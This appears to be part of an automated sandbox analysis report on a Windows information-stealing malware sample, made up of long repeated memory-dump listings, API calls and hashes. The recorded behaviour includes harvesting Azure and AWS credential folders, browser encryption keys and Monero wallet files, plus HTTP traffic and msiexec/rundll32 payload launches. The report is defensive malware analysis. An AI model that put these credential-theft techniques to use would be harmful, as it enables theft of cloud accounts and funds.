                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: b2155d6462819be2308628a542d718876a7b8cca960611097330d835a2d1521f
                          • Instruction ID: 8746e57472720652222d8c7215248d290cb6cdf49b31c6848c62453ae59708ee
                          • Opcode Fuzzy Hash: b2155d6462819be2308628a542d718876a7b8cca960611097330d835a2d1521f
                          • Instruction Fuzzy Hash: 90E1FD71810518ABDB58EBE0EC91FEEB77ABF18300F40415DF10666192DF746A4ACF6A
                          Function 00628320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • RegOpenKeyExA.ADVAPI32(00000000,0111B3C8,00000000,00020019,00000000,006305B6), ref: 006283A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00628426
                          • wsprintfA.USER32 ref: 00628459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0062847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0062848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00628499
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: 4b0288958ddd9b052da887074d1462bfba2868f78613cd38367b1370b75f1132
                          • Instruction ID: 2c69d5d5e254778310fc332dd3b5718cca196bcfa93145abf75e4cba1155f749
                          • Opcode Fuzzy Hash: 4b0288958ddd9b052da887074d1462bfba2868f78613cd38367b1370b75f1132
                          • Instruction Fuzzy Hash: 51811E719116289FDB68DB90DC91FEAB7B9FF08700F0082D8E109A6180DF756B85CF95
                          Function 00624D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00624DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00624DCD
                            • Part of subcall function 00624910: wsprintfA.USER32 ref: 0062492C
                            • Part of subcall function 00624910: FindFirstFileA.KERNEL32(?,?), ref: 00624943
                          • lstrcat.KERNEL32(?,00000000), ref: 00624E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00624E59
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,00630FDC), ref: 00624971
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,00630FE0), ref: 00624987
                            • Part of subcall function 00624910: FindNextFileA.KERNEL32(000000FF,?), ref: 00624B7D
                            • Part of subcall function 00624910: FindClose.KERNEL32(000000FF), ref: 00624B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00624EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00624EE5
                            • Part of subcall function 00624910: wsprintfA.USER32 ref: 006249B0
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,006308D2), ref: 006249C5
                            • Part of subcall function 00624910: wsprintfA.USER32 ref: 006249E2
                            • Part of subcall function 00624910: PathMatchSpecA.SHLWAPI(?,?), ref: 00624A1E
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,0111E8D8), ref: 00624A4A
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,00630FF8), ref: 00624A5C
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,?), ref: 00624A70
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,00630FFC), ref: 00624A82
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,?), ref: 00624A96
                            • Part of subcall function 00624910: CopyFileA.KERNEL32(?,?,00000001), ref: 00624AAC
                            • Part of subcall function 00624910: DeleteFileA.KERNEL32(?), ref: 00624B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 6a037c18a1aa8bec86d7896ee6dd1a9bda42d47c65f16684e7e625480b1bd3cf
                          • Instruction ID: 237010df2b45fac6725d49d21cdbcbff7056318df944938cc05266560aaf14f7
                          • Opcode Fuzzy Hash: 6a037c18a1aa8bec86d7896ee6dd1a9bda42d47c65f16684e7e625480b1bd3cf
                          • Instruction Fuzzy Hash: 3F41A3BA94021867D754F770EC87FED733AAB25700F004558B649660C1EEB55BCD8B92
                          Function 00629010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0062906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 50af01bdc282911655cddf7fcb3aa770f2b58c73c010c5b2fa6400a42b899cb6
                          • Instruction ID: 01161db6a16ae791ae8ac392a3f2d9b4d7b5ac5ac73cc1c721e05b611d526ed6
                          • Opcode Fuzzy Hash: 50af01bdc282911655cddf7fcb3aa770f2b58c73c010c5b2fa6400a42b899cb6
                          • Instruction Fuzzy Hash: 8571FEB5910208ABDB18DFE4DC89FEDB7B9BF48701F108618F615A7290DB38A945CF61
                          Function 00622E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 006231C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0062335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 006234EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 3433475ee1c4a7cf01ba70c41f9e97a499faf4aa9f8dcfc7187bfa3bf1e637bb
                          • Instruction ID: b965b1d04fcc0c537967228d16718465375083c3d65f64deeb7b58971a000d66
                          • Opcode Fuzzy Hash: 3433475ee1c4a7cf01ba70c41f9e97a499faf4aa9f8dcfc7187bfa3bf1e637bb
                          • Instruction Fuzzy Hash: A2120F718105289BDB49EBE0EC92FDDB73AAF14300F50415DF50666192EFB42B4ACF9A
                          Function 006252C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 00616280: InternetOpenA.WININET(00630DFE,00000001,00000000,00000000,00000000), ref: 006162E1
                            • Part of subcall function 00616280: StrCmpCA.SHLWAPI(?,0111E858), ref: 00616303
                            • Part of subcall function 00616280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00616335
                            • Part of subcall function 00616280: HttpOpenRequestA.WININET(00000000,GET,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00616385
                            • Part of subcall function 00616280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006163BF
                            • Part of subcall function 00616280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006163D1
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00625318
                          • lstrlen.KERNEL32(00000000), ref: 0062532F
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00625364
                          • lstrlen.KERNEL32(00000000), ref: 00625383
                          • lstrlen.KERNEL32(00000000), ref: 006253AE
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 8e8de7d25d9682f20bc3b40b8ff9cd9cfefd4a9610a7a95a65650cf48f2daa1d
                          • Instruction ID: 10fbe79bd8fa23ffbffb4639ce4c59e15d1686670be61fff68a56ab5f6963423
                          • Opcode Fuzzy Hash: 8e8de7d25d9682f20bc3b40b8ff9cd9cfefd4a9610a7a95a65650cf48f2daa1d
                          • Instruction Fuzzy Hash: 275121709109589BCB58FFA0ED92AED777BAF14300F50401CF9066A191EF746B46CF9A
                          Function 006212D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 96d6dcd57843d21ec35a830cce19d5d45e321b2b8823432a2592fe04312464eb
                          • Instruction ID: 927cd81c297317ece8c42edfb4a2342ea36c7e4979bd201659cfa90d7db2f03f
                          • Opcode Fuzzy Hash: 96d6dcd57843d21ec35a830cce19d5d45e321b2b8823432a2592fe04312464eb
                          • Instruction Fuzzy Hash: 01C1E8B59012299BCB54EF60ECC9FEA737ABF64300F00459CF50A67141DB74AA85CF95
                          Function 00624280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 006242EC
                          • lstrcat.KERNEL32(?,0111E1B8), ref: 0062430B
                          • lstrcat.KERNEL32(?,?), ref: 0062431F
                          • lstrcat.KERNEL32(?,0111D3C8), ref: 00624333
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 00628D90: GetFileAttributesA.KERNEL32(00000000,?,00611B54,?,?,0063564C,?,?,00630E1F), ref: 00628D9F
                            • Part of subcall function 00619CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00619D39
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                            • Part of subcall function 006293C0: GlobalAlloc.KERNEL32(00000000,006243DD,006243DD), ref: 006293D3
                          • StrStrA.SHLWAPI(?,0111E218), ref: 006243F3
                          • GlobalFree.KERNEL32(?), ref: 00624512
                            • Part of subcall function 00619AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619AEF
                            • Part of subcall function 00619AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00614EEE,00000000,?), ref: 00619B01
                            • Part of subcall function 00619AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619B2A
                            • Part of subcall function 00619AC0: LocalFree.KERNEL32(?,?,?,?,00614EEE,00000000,?), ref: 00619B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 006244A3
                          • StrCmpCA.SHLWAPI(?,006308D1), ref: 006244C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006244D2
                          • lstrcat.KERNEL32(00000000,?), ref: 006244E5
                          • lstrcat.KERNEL32(00000000,00630FB8), ref: 006244F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: c9ec456cdd539017b1160a687b259fdb5f4e72df68c105e4e43fb2aa98987a78
                          • Instruction ID: 944d0200c85f2e133544ea07f7f5aafd15733faf32be6c2da36eafbc06efe5fe
                          • Opcode Fuzzy Hash: c9ec456cdd539017b1160a687b259fdb5f4e72df68c105e4e43fb2aa98987a78
                          • Instruction Fuzzy Hash: CD7185B6900618ABCB54EBA0EC95FEE737ABF48300F04459CF60597181EA74DB49CFA5
                          Function 00611310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 006112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006112B4
                            • Part of subcall function 006112A0: RtlAllocateHeap.NTDLL(00000000), ref: 006112BB
                            • Part of subcall function 006112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006112D7
                            • Part of subcall function 006112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006112F5
                            • Part of subcall function 006112A0: RegCloseKey.ADVAPI32(?), ref: 006112FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0061134F
                          • lstrlen.KERNEL32(?), ref: 0061135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00611377
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00611465
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 006114EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
